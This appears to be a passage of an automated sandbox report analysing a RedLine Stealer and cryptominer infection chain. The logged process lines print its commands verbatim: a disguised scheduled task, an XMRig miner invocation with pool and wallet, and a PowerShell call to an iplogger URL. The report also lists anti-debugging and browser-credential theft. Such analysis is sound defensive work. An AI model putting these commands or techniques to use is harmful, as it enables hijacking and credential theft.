                  Source: C:\Users\user\AppData\Local\Temp\revs.exeThread information set: HideFromDebugger
                  Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess queried: DebugObjectHandle
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess queried: DebugObjectHandle
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess queried: DebugObjectHandle
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess queried: DebugObjectHandle
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess queried: DebugObjectHandle
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_004261F0 IsDebuggerPresent,DebuggerProbe,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_004111C0 InterlockedIncrement,__itow_s,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcscpy_s,_wcscpy_s,_wcscat_s,_wcscat_s,_wcscat_s,__snwprintf_s,_wcscpy_s,_wcscpy_s,__cftoe,__lock,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__itow_s,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00412560 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00850D90 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_0085092B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00AB18BB push dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00427790 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,__get_osfhandle,SetEndOfFile,GetLastError,__lseeki64_nolock,
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00412D20 SetUnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeMemory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess created: C:\Users\user\AppData\Local\nulhfhsi.exe 'C:\Users\user\AppData\Local\nulhfhsi.exe'
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess created: C:\Users\user\AppData\Local\lxoqz3o0.exe 'C:\Users\user\AppData\Local\lxoqz3o0.exe'
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess created: C:\Users\user\AppData\Local\Temp\evs.exe 'C:\Users\user\AppData\Local\Temp\evs.exe'
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess created: C:\Users\user\AppData\Local\Temp\revs.exe 'C:\Users\user\AppData\Local\Temp\revs.exe'
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe 'hello_C# (2).exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\hello_C#.exe 'hello_C#.exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\jo.exe 'jo.exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                  Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
                  Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
                  Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008BA446 cpuid
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: LoadLibraryExA,SetConsoleOutputCP,GetTimeFormatW,GetLocaleInfoW,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: GetLocaleInfoA,
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeQueries volume information: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hello_C#.exe VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_004011D1 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008BA446 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected RedLine StealerShow sources
                  Source: Yara matchFile source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nulhfhsi.exe PID: 6988, type: MEMORY
                  Source: Yara matchFile source: 4.2.nulhfhsi.exe.3b0000.0.unpack, type: UNPACKEDPE
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: Yara matchFile source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nulhfhsi.exe PID: 6988, type: MEMORY
                  Source: Yara matchFile source: 4.2.nulhfhsi.exe.3b0000.0.unpack, type: UNPACKEDPE

                  Remote Access Functionality:

                  barindex
                  Yara detected RedLine StealerShow sources
                  Source: Yara matchFile source: 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.266479217.0000000001590000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nulhfhsi.exe PID: 6988, type: MEMORY
                  Source: Yara matchFile source: 4.2.nulhfhsi.exe.3b0000.0.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation421Startup Items1Startup Items1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                  Default AccountsNative API1Windows Service1Access Token Manipulation1Obfuscated Files or Information2Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsScheduled Task/Job1Scheduled Task/Job1Windows Service1Software Packing23Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesInput Capture1Automated ExfiltrationEncrypted Channel12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Registry Run Keys / Startup Folder12Process Injection12Timestomp1NTDSSystem Information Discovery257Distributed Component Object ModelClipboard Data2Scheduled TransferNon-Standard Port11SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptScheduled Task/Job1Masquerading1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol4Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder12Virtualization/Sandbox Evasion55Cached Domain CredentialsSecurity Software Discovery871VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol5Jamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion55Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemProcess Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356507 Sample: 8TD8GfTtaW.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 95 iplogger.org 2->95 117 Sigma detected: Xmrig 2->117 119 Multi AV Scanner detection for domain / URL 2->119 121 Antivirus detection for URL or domain 2->121 123 11 other signatures 2->123 11 8TD8GfTtaW.exe 15 6 2->11         started        16 RantimeBroker.exe 3 2->16         started        18 iexplore.exe 2->18         started        20 Chrome updater.exe 2->20         started        signatures3 process4 dnsIp5 111 blog.agencia10x.com 104.21.67.51, 443, 49723 CLOUDFLARENETUS United States 11->111 113 iplogger.org 88.99.66.31, 443, 49720, 49729 HETZNER-ASDE Germany 11->113 115 pastebin.com 104.23.99.190, 443, 49721 CLOUDFLARENETUS United States 11->115 89 C:\Users\user\AppData\Local\nulhfhsi.exe, PE32 11->89 dropped 91 C:\Users\user\AppData\Local\lxoqz3o0.exe, PE32 11->91 dropped 93 C:\Users\user\AppData\...\8TD8GfTtaW.exe.log, ASCII 11->93 dropped 161 Detected unpacking (changes PE section rights) 11->161 163 Query firmware table information (likely to detect VMs) 11->163 165 Hides threads from debuggers 11->165 22 nulhfhsi.exe 14 26 11->22         started        27 lxoqz3o0.exe 14 10 11->27         started        167 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->167 169 Tries to detect sandboxes / dynamic malware analysis system (registry check) 16->169 29 schtasks.exe 16->29         started        31 cpu.exe 16->31         started        33 iexplore.exe 18->33         started        file6 signatures7 process8 dnsIp9 97 blog.agencia10x.com 22->97 99 api.ip.sb 22->99 105 9 other IPs or domains 22->105 77 C:\Users\user\AppData\Local\Temp\revs.exe, PE32 22->77 dropped 79 C:\Users\user\AppData\Local\Temp\evs.exe, PE32 22->79 dropped 147 Multi AV Scanner detection for dropped file 22->147 149 Detected unpacking (changes PE section rights) 22->149 151 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->151 159 4 other signatures 22->159 35 evs.exe 22->35         started        39 revs.exe 22->39         started        101 195.2.84.91, 49728, 80 ZENON-ASMoscowRussiaRU Russian Federation 27->101 103 iplogger.org 27->103 81 C:\Users\user\AppData\...\RantimeBroker.exe, PE32 27->81 dropped 83 C:\Users\user\AppData\Roaming\...\cpu.exe, PE32+ 27->83 dropped 85 C:\Users\user\AppData\...\WinRing0x64.sys, PE32+ 27->85 dropped 87 C:\Users\user\AppData\Roaming\...\config.json, ASCII 27->87 dropped 153 Query firmware table information (likely to detect VMs) 27->153 155 Sample is not signed and drops a device driver 27->155 157 Hides threads from debuggers 27->157 42 cpu.exe 27->42         started        44 schtasks.exe 1 27->44         started        46 conhost.exe 29->46         started        file10 signatures11 process12 dnsIp13 67 C:\Users\user\AppData\Local\Temp\jo.exe, PE32 35->67 dropped 69 C:\Users\user\AppData\Local\...\KSRDY0PL.dll, PE32 35->69 dropped 71 C:\Users\user\AppData\Local\...\hello_C#.exe, PE32 35->71 dropped 73 C:\Users\user\AppData\...\hello_C# (2).exe, PE32 35->73 dropped 125 Multi AV Scanner detection for dropped file 35->125 127 Machine Learning detection for dropped file 35->127 48 cmd.exe 35->48         started        107 iplogger.org 39->107 75 C:\Users\user\AppData\...\Chrome updater.exe, PE32 39->75 dropped 129 Detected unpacking (changes PE section rights) 39->129 131 Query firmware table information (likely to detect VMs) 39->131 133 Tries to detect sandboxes and other dynamic analysis tools (window names) 39->133 137 3 other signatures 39->137 109 pool.minexmr.com 51.68.21.186, 4444, 49730 OVHFR France 42->109 50 conhost.exe 42->50         started        52 conhost.exe 44->52         started        file14 135 Detected Stratum mining protocol 109->135 signatures15 process16 process17 54 jo.exe 48->54         started        57 hello_C# (2).exe 48->57         started        59 hello_C#.exe 48->59         started        61 2 other processes 48->61 signatures18 139 Multi AV Scanner detection for dropped file 54->139 141 Detected unpacking (changes PE section rights) 54->141 143 Detected unpacking (overwrites its own PE header) 54->143 145 3 other signatures 54->145 63 conhost.exe 57->63         started        65 conhost.exe 59->65         started        process19

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  8TD8GfTtaW.exe43%VirustotalBrowse

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\evs.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\jo.exe100%Joe Sandbox ML
